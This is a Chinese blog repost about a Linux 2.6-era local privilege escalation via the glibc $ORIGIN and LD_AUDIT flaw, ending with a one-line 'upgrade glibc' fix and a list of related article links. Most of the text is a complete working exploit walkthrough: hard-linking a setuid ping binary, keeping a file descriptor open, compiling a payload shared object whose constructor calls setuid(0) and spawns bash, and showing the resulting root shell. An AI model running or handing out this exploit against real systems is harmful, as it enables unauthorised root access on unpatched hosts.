linux2.6内核本地提权
2012-01-03 18:39
399 查看
linux2.6内核本地提权 It is possible to exploit this flaw to execute arbitrary code as root. Please note, this is a low impact vulnerability that is only of interest to security professionals and system administrators. End users do not need to be concerned. Exploitation would look like the following. # Create a directory in /tmp we can control. $ mkdir /tmp/exploit # Link to an suid binary, thus changing the definition of $ORIGIN. $ ln /bin/ping /tmp/exploit/target # Open a file descriptor to the target binary (note: some users are surprised # to learn exec can be used to manipulate the redirections of the current # shell if a command is not specified. This is what is happening below). $ exec 3< /tmp/exploit/target # This descriptor should now be accessible via /proc. $ ls -l /proc/$$/fd/3 lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target* # Remove the directory previously created $ rm -rf /tmp/exploit/ # The /proc link should still exist, but now will be marked deleted. $ ls -l /proc/$$/fd/3 lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted) # Replace the directory with a payload DSO, thus making $ORIGIN a valid target to dlopen(). $ cat > payload.c void __attribute__((constructor)) init() { setuid(0); system("/bin/bash"); } ^D $ gcc -w -fPIC -shared -o /tmp/exploit payload.c $ ls -l /tmp/exploit -rwxrwx--- 1 taviso taviso 4.2K Oct 15 09:22 /tmp/exploit* # Now force the link in /proc to load $ORIGIN via LD_AUDIT. $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 sh-4.1# whoami root sh-4.1# id uid=0(root) gid=500(taviso) 漏洞解决方法(这是由GCC引发的一个漏洞): 升级:glibc |
相关文章推荐
- linux2.6内核本地提权,低权限获取root
- linux2.6内核本地提权,低权限获取root
- Linux2.6内核本地提权
- “脏牛(Dirty Cow)”漏洞】CVE-2016-5195:Linux 内核本地提权漏洞 通告及修复
- linux本地内核提权漏洞 Dirty COW 成因分析
- linux2.6内核Makefile详解
- inotify -- Linux 2.6 内核中的文件系统变化通知机制
- linux2.6内核下的一个按键中断驱动程序示例
- linux2.6内核epoll用法举例说明
- Linux2.6内核epoll介绍
- linux-2.6 内核模块编程探索
- linux 2.6 内核的调度程序分析
- 记一个linux内核内存提权问题
- linux2.6内核Makefile详解
- Linux2.6 内核的 Initrd 机制解析
- inotify -- Linux 2.6 内核中的文件系统变化通知机制
- linux2.6内核Makefile简单语法与应用
- Linux 2.6内核中新的锁机制--RCU
- Linux 2.6内核的精彩世界(二)
- Linux 2.6 内核阅读笔记 内存管理